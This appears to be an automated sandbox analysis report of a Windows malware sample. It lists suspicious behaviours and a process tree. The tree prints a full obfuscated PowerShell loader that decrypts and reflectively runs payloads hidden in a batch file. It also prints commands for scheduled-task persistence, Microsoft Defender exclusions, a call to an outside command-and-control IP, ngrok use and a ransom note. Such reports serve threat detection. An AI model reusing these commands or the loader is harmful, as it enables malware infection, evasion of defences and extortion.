Scheduled Task
T1053.005

Processes:

schtasks.exe

pid process

5056 schtasks.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

explorer.exe

pid process

4800 explorer.exe

pid	process
3656	NOTEPAD.EXE

pid	process
5056	schtasks.exe

pid	process
4800	explorer.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeSystem Userpowershell.exeSystem UserSystem Usermsedge.exemsedge.exeSystem User

pid	process
4072	powershell.exe
4072	powershell.exe
3184	powershell.exe
3184	powershell.exe
3184	powershell.exe
3752	powershell.exe
3752	powershell.exe
3752	powershell.exe
3180	powershell.exe
3180	powershell.exe
3180	powershell.exe
4380	powershell.exe
4380	powershell.exe
4380	powershell.exe
3224	powershell.exe
3224	powershell.exe
3224	powershell.exe
3184	powershell.exe
3184	powershell.exe
3184	powershell.exe
3752	powershell.exe
3616	System User
3616	System User
3616	System User
3452	powershell.exe
3452	powershell.exe
3452	powershell.exe
1864	System User
1864	System User
1732	System User
1732	System User
1840	msedge.exe
1840	msedge.exe
4112	msedge.exe
4112	msedge.exe
3752	powershell.exe
3752	powershell.exe
3752	powershell.exe
3752	powershell.exe
3752	powershell.exe
3752	powershell.exe
3752	powershell.exe
3752	powershell.exe
3752	powershell.exe
3752	powershell.exe
3752	powershell.exe
3752	powershell.exe
3752	powershell.exe
3752	powershell.exe
3752	powershell.exe
3752	powershell.exe
3752	powershell.exe
3752	powershell.exe
3752	powershell.exe
3752	powershell.exe
2360	System User
2360	System User
3752	powershell.exe
3752	powershell.exe
3752	powershell.exe
3752	powershell.exe
3752	powershell.exe
3752	powershell.exe
3752	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

explorer.exepowershell.exe

pid process

4800 explorer.exe
3752 powershell.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

Processes:

chrome.exemsedge.exe

pid process

2736 chrome.exe
2736 chrome.exe
2736 chrome.exe
2736 chrome.exe
2736 chrome.exe
1840 msedge.exe
1840 msedge.exe

pid	process
4800	explorer.exe
3752	powershell.exe

pid	process
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
1840	msedge.exe
1840	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4072	powershell.exe
Token: SeDebugPrivilege	3184	powershell.exe
Token: SeIncreaseQuotaPrivilege	3184	powershell.exe
Token: SeSecurityPrivilege	3184	powershell.exe
Token: SeTakeOwnershipPrivilege	3184	powershell.exe
Token: SeLoadDriverPrivilege	3184	powershell.exe
Token: SeSystemProfilePrivilege	3184	powershell.exe
Token: SeSystemtimePrivilege	3184	powershell.exe
Token: SeProfSingleProcessPrivilege	3184	powershell.exe
Token: SeIncBasePriorityPrivilege	3184	powershell.exe
Token: SeCreatePagefilePrivilege	3184	powershell.exe
Token: SeBackupPrivilege	3184	powershell.exe
Token: SeRestorePrivilege	3184	powershell.exe
Token: SeShutdownPrivilege	3184	powershell.exe
Token: SeDebugPrivilege	3184	powershell.exe
Token: SeSystemEnvironmentPrivilege	3184	powershell.exe
Token: SeRemoteShutdownPrivilege	3184	powershell.exe
Token: SeUndockPrivilege	3184	powershell.exe
Token: SeManageVolumePrivilege	3184	powershell.exe
Token: 33	3184	powershell.exe
Token: 34	3184	powershell.exe
Token: 35	3184	powershell.exe
Token: 36	3184	powershell.exe
Token: SeIncreaseQuotaPrivilege	3184	powershell.exe
Token: SeSecurityPrivilege	3184	powershell.exe
Token: SeTakeOwnershipPrivilege	3184	powershell.exe
Token: SeLoadDriverPrivilege	3184	powershell.exe
Token: SeSystemProfilePrivilege	3184	powershell.exe
Token: SeSystemtimePrivilege	3184	powershell.exe
Token: SeProfSingleProcessPrivilege	3184	powershell.exe
Token: SeIncBasePriorityPrivilege	3184	powershell.exe
Token: SeCreatePagefilePrivilege	3184	powershell.exe
Token: SeBackupPrivilege	3184	powershell.exe
Token: SeRestorePrivilege	3184	powershell.exe
Token: SeShutdownPrivilege	3184	powershell.exe
Token: SeDebugPrivilege	3184	powershell.exe
Token: SeSystemEnvironmentPrivilege	3184	powershell.exe
Token: SeRemoteShutdownPrivilege	3184	powershell.exe
Token: SeUndockPrivilege	3184	powershell.exe
Token: SeManageVolumePrivilege	3184	powershell.exe
Token: 33	3184	powershell.exe
Token: 34	3184	powershell.exe
Token: 35	3184	powershell.exe
Token: 36	3184	powershell.exe
Token: SeIncreaseQuotaPrivilege	3184	powershell.exe
Token: SeSecurityPrivilege	3184	powershell.exe
Token: SeTakeOwnershipPrivilege	3184	powershell.exe
Token: SeLoadDriverPrivilege	3184	powershell.exe
Token: SeSystemProfilePrivilege	3184	powershell.exe
Token: SeSystemtimePrivilege	3184	powershell.exe
Token: SeProfSingleProcessPrivilege	3184	powershell.exe
Token: SeIncBasePriorityPrivilege	3184	powershell.exe
Token: SeCreatePagefilePrivilege	3184	powershell.exe
Token: SeBackupPrivilege	3184	powershell.exe
Token: SeRestorePrivilege	3184	powershell.exe
Token: SeShutdownPrivilege	3184	powershell.exe
Token: SeDebugPrivilege	3184	powershell.exe
Token: SeSystemEnvironmentPrivilege	3184	powershell.exe
Token: SeRemoteShutdownPrivilege	3184	powershell.exe
Token: SeUndockPrivilege	3184	powershell.exe
Token: SeManageVolumePrivilege	3184	powershell.exe
Token: 33	3184	powershell.exe
Token: 34	3184	powershell.exe
Token: 35	3184	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

rundll32.exeiexplore.exefirefox.exechrome.exe

pid	process
2060	rundll32.exe
2060	rundll32.exe
2060	rundll32.exe
2060	rundll32.exe
2060	rundll32.exe
2060	rundll32.exe
2060	rundll32.exe
2060	rundll32.exe
2060	rundll32.exe
2060	rundll32.exe
2060	rundll32.exe
2060	rundll32.exe
2060	rundll32.exe
2060	rundll32.exe
2060	rundll32.exe
2060	rundll32.exe
2060	rundll32.exe
2060	rundll32.exe
2060	rundll32.exe
2060	rundll32.exe
2060	rundll32.exe
2060	rundll32.exe
1908	iexplore.exe
3616	firefox.exe
3616	firefox.exe
3616	firefox.exe
3616	firefox.exe
3616	firefox.exe
3616	firefox.exe
3616	firefox.exe
3616	firefox.exe
3616	firefox.exe
3616	firefox.exe
3616	firefox.exe
3616	firefox.exe
3616	firefox.exe
3616	firefox.exe
3616	firefox.exe
3616	firefox.exe
3616	firefox.exe
3616	firefox.exe
3616	firefox.exe
3616	firefox.exe
3616	firefox.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

firefox.exechrome.exe

pid	process
3616	firefox.exe
3616	firefox.exe
3616	firefox.exe
3616	firefox.exe
3616	firefox.exe
3616	firefox.exe
3616	firefox.exe
3616	firefox.exe
3616	firefox.exe
3616	firefox.exe
3616	firefox.exe
3616	firefox.exe
3616	firefox.exe
3616	firefox.exe
3616	firefox.exe
3616	firefox.exe
3616	firefox.exe
3616	firefox.exe
3616	firefox.exe
3616	firefox.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe
2736	chrome.exe

Suspicious use of SetWindowsHookEx 17 IoCs

Processes:

powershell.exeexplorer.exeiexplore.exeIEXPLORE.EXEfirefox.exeLogonUI.exeMEMZ.exeMEMZ.exeMEMZ.exeMEMZ.exeMEMZ.exe

pid	process
3752	powershell.exe
4800	explorer.exe
4800	explorer.exe
1908	iexplore.exe
1908	iexplore.exe
3700	IEXPLORE.EXE
3700	IEXPLORE.EXE
3616	firefox.exe
6248	LogonUI.exe
5844	MEMZ.exe
5224	MEMZ.exe
5220	MEMZ.exe
4656	MEMZ.exe
5940	MEMZ.exe
5844	MEMZ.exe
5224	MEMZ.exe
5220	MEMZ.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exenet.exepowershell.exeWScript.execmd.exenet.exepowershell.execvtres.exepowershell.exemsedge.exe

description	pid	process	target process
PID 1664 wrote to memory of 4984	1664	cmd.exe	net.exe
PID 1664 wrote to memory of 4984	1664	cmd.exe	net.exe
PID 4984 wrote to memory of 3224	4984	net.exe	net1.exe
PID 4984 wrote to memory of 3224	4984	net.exe	net1.exe
PID 1664 wrote to memory of 4072	1664	cmd.exe	powershell.exe
PID 1664 wrote to memory of 4072	1664	cmd.exe	powershell.exe
PID 4072 wrote to memory of 3184	4072	powershell.exe	powershell.exe
PID 4072 wrote to memory of 3184	4072	powershell.exe	powershell.exe
PID 4072 wrote to memory of 1092	4072	powershell.exe	WScript.exe
PID 4072 wrote to memory of 1092	4072	powershell.exe	WScript.exe
PID 1092 wrote to memory of 544	1092	WScript.exe	cmd.exe
PID 1092 wrote to memory of 544	1092	WScript.exe	cmd.exe
PID 544 wrote to memory of 4308	544	cmd.exe	net.exe
PID 544 wrote to memory of 4308	544	cmd.exe	net.exe
PID 4308 wrote to memory of 2504	4308	net.exe	net1.exe
PID 4308 wrote to memory of 2504	4308	net.exe	net1.exe
PID 544 wrote to memory of 3752	544	cmd.exe	powershell.exe
PID 544 wrote to memory of 3752	544	cmd.exe	powershell.exe
PID 3752 wrote to memory of 3180	3752	powershell.exe	powershell.exe
PID 3752 wrote to memory of 3180	3752	powershell.exe	powershell.exe
PID 3752 wrote to memory of 4380	3752	powershell.exe	powershell.exe
PID 3752 wrote to memory of 4380	3752	powershell.exe	powershell.exe
PID 3752 wrote to memory of 3224	3752	powershell.exe	powershell.exe
PID 3752 wrote to memory of 3224	3752	powershell.exe	powershell.exe
PID 3752 wrote to memory of 3184	3752	powershell.exe	powershell.exe
PID 3752 wrote to memory of 3184	3752	powershell.exe	powershell.exe
PID 3752 wrote to memory of 5056	3752	powershell.exe	schtasks.exe
PID 3752 wrote to memory of 5056	3752	powershell.exe	schtasks.exe
PID 3752 wrote to memory of 5108	3752	powershell.exe	cvtres.exe
PID 3752 wrote to memory of 5108	3752	powershell.exe	cvtres.exe
PID 3752 wrote to memory of 5108	3752	powershell.exe	cvtres.exe
PID 3752 wrote to memory of 5108	3752	powershell.exe	cvtres.exe
PID 3752 wrote to memory of 5108	3752	powershell.exe	cvtres.exe
PID 3752 wrote to memory of 5108	3752	powershell.exe	cvtres.exe
PID 3752 wrote to memory of 5108	3752	powershell.exe	cvtres.exe
PID 3752 wrote to memory of 5108	3752	powershell.exe	cvtres.exe
PID 5108 wrote to memory of 3452	5108	cvtres.exe	powershell.exe
PID 5108 wrote to memory of 3452	5108	cvtres.exe	powershell.exe
PID 5108 wrote to memory of 3452	5108	cvtres.exe	powershell.exe
PID 3452 wrote to memory of 396	3452	powershell.exe	explorer.exe
PID 3452 wrote to memory of 396	3452	powershell.exe	explorer.exe
PID 3452 wrote to memory of 396	3452	powershell.exe	explorer.exe
PID 3752 wrote to memory of 4248	3752	powershell.exe	taskkill.exe
PID 3752 wrote to memory of 4248	3752	powershell.exe	taskkill.exe
PID 3752 wrote to memory of 1952	3752	powershell.exe	ngrok.exe
PID 3752 wrote to memory of 1952	3752	powershell.exe	ngrok.exe
PID 3752 wrote to memory of 1952	3752	powershell.exe	ngrok.exe
PID 3752 wrote to memory of 4432	3752	powershell.exe	msedge.exe
PID 3752 wrote to memory of 4432	3752	powershell.exe	msedge.exe
PID 1840 wrote to memory of 4464	1840	msedge.exe	msedge.exe
PID 1840 wrote to memory of 4464	1840	msedge.exe	msedge.exe
PID 1840 wrote to memory of 3796	1840	msedge.exe	msedge.exe
PID 1840 wrote to memory of 3796	1840	msedge.exe	msedge.exe
PID 1840 wrote to memory of 3796	1840	msedge.exe	msedge.exe
PID 1840 wrote to memory of 3796	1840	msedge.exe	msedge.exe
PID 1840 wrote to memory of 3796	1840	msedge.exe	msedge.exe
PID 1840 wrote to memory of 3796	1840	msedge.exe	msedge.exe
PID 1840 wrote to memory of 3796	1840	msedge.exe	msedge.exe
PID 1840 wrote to memory of 3796	1840	msedge.exe	msedge.exe
PID 1840 wrote to memory of 3796	1840	msedge.exe	msedge.exe
PID 1840 wrote to memory of 3796	1840	msedge.exe	msedge.exe
PID 1840 wrote to memory of 3796	1840	msedge.exe	msedge.exe
PID 1840 wrote to memory of 3796	1840	msedge.exe	msedge.exe
PID 1840 wrote to memory of 3796	1840	msedge.exe	msedge.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\XClient.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1664
- C:\Windows\system32\net.exe
  net file
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4984
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 file
    3⤵
    PID:3224
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y+qf52DrQiYLUaozbbmw9JavODvF6+9CeZx0/k94u9k='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4WB4xmZ2PUqqywaBQpnlmg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vfVzQ=New-Object System.IO.MemoryStream(,$param_var); $AjFMf=New-Object System.IO.MemoryStream; $JrhbC=New-Object System.IO.Compression.GZipStream($vfVzQ, [IO.Compression.CompressionMode]::Decompress); $JrhbC.CopyTo($AjFMf); $JrhbC.Dispose(); $vfVzQ.Dispose(); $AjFMf.Dispose(); $AjFMf.ToArray();}function execute_function($param_var,$param2_var){ $AKLYU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $eguYy=$AKLYU.EntryPoint; $eguYy.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\XClient.bat';$FsplU=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\XClient.bat').Split([Environment]::NewLine);foreach ($NLDPG in $FsplU) { if ($NLDPG.StartsWith(':: ')) { $wgQrx=$NLDPG.Substring(3); break; }}$payloads_var=[string[]]$wgQrx.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4072
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_595_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_595.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3184
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_595.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:1092
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_595.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:544
    - - C:\Windows\system32\net.exe
        
        net file
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4308
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        6⤵
        
        PID:2504
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y+qf52DrQiYLUaozbbmw9JavODvF6+9CeZx0/k94u9k='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4WB4xmZ2PUqqywaBQpnlmg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vfVzQ=New-Object System.IO.MemoryStream(,$param_var); $AjFMf=New-Object System.IO.MemoryStream; $JrhbC=New-Object System.IO.Compression.GZipStream($vfVzQ, [IO.Compression.CompressionMode]::Decompress); $JrhbC.CopyTo($AjFMf); $JrhbC.Dispose(); $vfVzQ.Dispose(); $AjFMf.Dispose(); $AjFMf.ToArray();}function execute_function($param_var,$param2_var){ $AKLYU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $eguYy=$AKLYU.EntryPoint; $eguYy.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_595.bat';$FsplU=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_595.bat').Split([Environment]::NewLine);foreach ($NLDPG in $FsplU) { if ($NLDPG.StartsWith(':: ')) { $wgQrx=$NLDPG.Substring(3); break; }}$payloads_var=[string[]]$wgQrx.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        Adds Run key to start application
        Drops desktop.ini file(s)
        Sets desktop wallpaper using registry
        Suspicious use of SetThreadContext
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:3752
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3180
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4380
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System User'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3224
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System User'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3184
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System User" /tr "C:\Users\Admin\AppData\Roaming\System User"
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5056
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 147.185.221.22 34085 <123456789> BD45BAA9E59375C2A83F
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:5108
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -c explorer shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257}
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3452
        
        C:\Windows\SysWOW64\explorer.exe
        
        "C:\Windows\system32\explorer.exe" shell::: -encodedCommand MwAwADgAMABGADkAMABFAC0ARAA3AEEARAAtADEAMQBEADkALQBCAEQAOQA4AC0AMAAwADAAMAA5ADQANwBCADAAMgA1ADcA -inputFormat xml -outputFormat text
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:396
      - C:\Windows\System32\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /im ngrok.exe /f
        6⤵
        Kills process with taskkill
        
        PID:4248
      - C:\Users\Admin\AppData\Local\Temp\ngrok.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ngrok.exe" config add-authtoken Your_Authtoken
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1952
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\How To Decrypt My Files.html
        6⤵
        
        PID:4432
      - C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\ykvqgq.gif
        6⤵
        Modifies Internet Explorer settings
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:1908
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1908 CREDAT:17410 /prefetch:2
        7⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:3700
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yansrl.bat" "
        6⤵
        
        PID:4600

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4216,i,16316361669272684588,6171287487746154806,262144 --variations-seed-version --mojo-platform-channel-handle=1040 /prefetch:8
1⤵
PID:512

C:\Users\Admin\AppData\Roaming\System User
"C:\Users\Admin\AppData\Roaming\System User"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3616

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4800

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding
1⤵
PID:4440

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {515980c3-57fe-4c1e-a561-730dd256ab98} -Embedding
1⤵
- Suspicious use of FindShellTrayWindow
PID:2060

C:\Users\Admin\AppData\Roaming\System User
"C:\Users\Admin\AppData\Roaming\System User"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1864

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --field-trial-handle=2140,i,16316361669272684588,6171287487746154806,262144 --variations-seed-version --mojo-platform-channel-handle=3852 /prefetch:1
1⤵
PID:2916

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=4144,i,16316361669272684588,6171287487746154806,262144 --variations-seed-version --mojo-platform-channel-handle=3820 /prefetch:1
1⤵
PID:5000

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=5452,i,16316361669272684588,6171287487746154806,262144 --variations-seed-version --mojo-platform-channel-handle=5464 /prefetch:8
1⤵
PID:3636

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --field-trial-handle=5440,i,16316361669272684588,6171287487746154806,262144 --variations-seed-version --mojo-platform-channel-handle=5524 /prefetch:8
1⤵
PID:3332

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of WriteProcessMemory
PID:1840
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=127.0.6533.89 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=127.0.2651.86 --initial-client-data=0x238,0x23c,0x240,0x234,0x29c,0x7ffa1f0bd198,0x7ffa1f0bd1a4,0x7ffa1f0bd1b0
  2⤵
  PID:4464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2204,i,6373813454583221199,18365006311207748646,262144 --variations-seed-version --mojo-platform-channel-handle=2200 /prefetch:2
  2⤵
  PID:3796
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
